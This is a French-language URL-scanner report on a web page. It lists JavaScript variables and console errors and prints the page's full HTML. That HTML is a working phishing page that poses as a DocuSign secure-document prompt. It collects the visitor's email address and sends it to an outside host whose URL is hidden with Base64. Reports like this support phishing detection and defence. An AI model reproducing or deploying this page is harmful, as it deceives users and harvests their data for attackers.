- ID de l'analyse :
- 48460d71-ed16-4fd9-8c61-11b8614a024eTerminée
- URL soumise :
- https://filecashflow.z13.web.core.windows.net/
- Fin du rapport :
Liens : 0 trouvé(s)
Liens sortants identifiés à partir de la page
Variables JavaScript : 5 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
continueLoading | function |
validateEmail | function |
Messages de journal de console : 2 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
error | network |
|
error | network |
|
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Verify Your Identity</title> <style> body { font-family: "Segoe UI", "Segoe UI Web (West European)", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif; background-color: #f4f4f4; margin: 0; display: flex; justify-content: center; align-items: center; height: 100vh; color: #333; background-image: url('images/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg'); background-size: cover; background-position: center; } .header { width: 100%; background-color: #0078d4; color: white; text-align: left; padding: 10px 20px; box-sizing: border-box; font-size: 18px; position: absolute; top: 0; } .header span { margin-left: 20px; } .container { background-color: white; border: 1px solid #ccc; border-radius: 3px; padding: 33px; width: 80%; max-width: 300px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); text-align: center; margin-top: 0px; } .container img { width: 100px; margin-bottom: 20px; } .container h2 { font-size: 24px; margin-bottom: 20px; color: #333; } .container p { margin-bottom: 10px; color: #666; } .container p2 { display: block; margin-bottom: 10px; color: #666; font-size: 13px; margin-bottom: 20px; } .container input[type="email"] { width: 100%; padding: 10px; margin-bottom: 20px; border: 1px solid #ccc; border-radius: 3px; font-size: 16px; box-sizing: border-box; text-align: center; } .container button { width: 100%; padding: 10px; background-color: #0078d4; color: white; border: none; border-radius: 3px; font-size: 16px; cursor: pointer; } .container button:hover { background-color: #005a9e; } .container .footer { font-size: 12px; color: #888; margin-top: 20px; } @media (max-width: 600px) { .container { padding: 20px; } .container h2 { font-size: 20px; } .container .space { margin-bottom: 20px; } .container input[type="email"] { font-size: 14px; } .container button { font-size: 14px; } } </style> </head> <body> <div class="container"> <img src="https://logos-world.net/wp-content/uploads/2021/08/DocuSign-Logo-1.png" alt="soft Logo"> <h2>Verify Your Identity</h2> <p><strong>You've received a secure document:</strong></p> <p2>To access this secure document, we'll need to verify the intended recipient's email. Please enter the email address to which this document was shared.</p2> <input type="email" id="email-input" placeholder="Enter email" required="" style="margin-top: 10px;"> <button id="continue-button">Next</button> </div> <script> function continueLoading() { const emailInput = document.getElementById('email-input'); const email = emailInput.value.trim().toLowerCase(); if (validateEmail(email)) { const link = "aHR0cHM6Ly9jZW8tcGRmLmNvbQ=="; // Base64 encoded link
const decodedLink = atob(link); const finalLink = `${decodedLink}/&${email}`; window.location.href = finalLink; } else { alert("Please enter a valid email address."); } } function validateEmail(email) { const re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/; return re.test(email); } document.getElementById('continue-button').addEventListener('click', continueLoading); document.getElementById('email-input').addEventListener('keydown', function(event) { if (event.key === 'Enter') { continueLoading(); } }); </script> </body></html>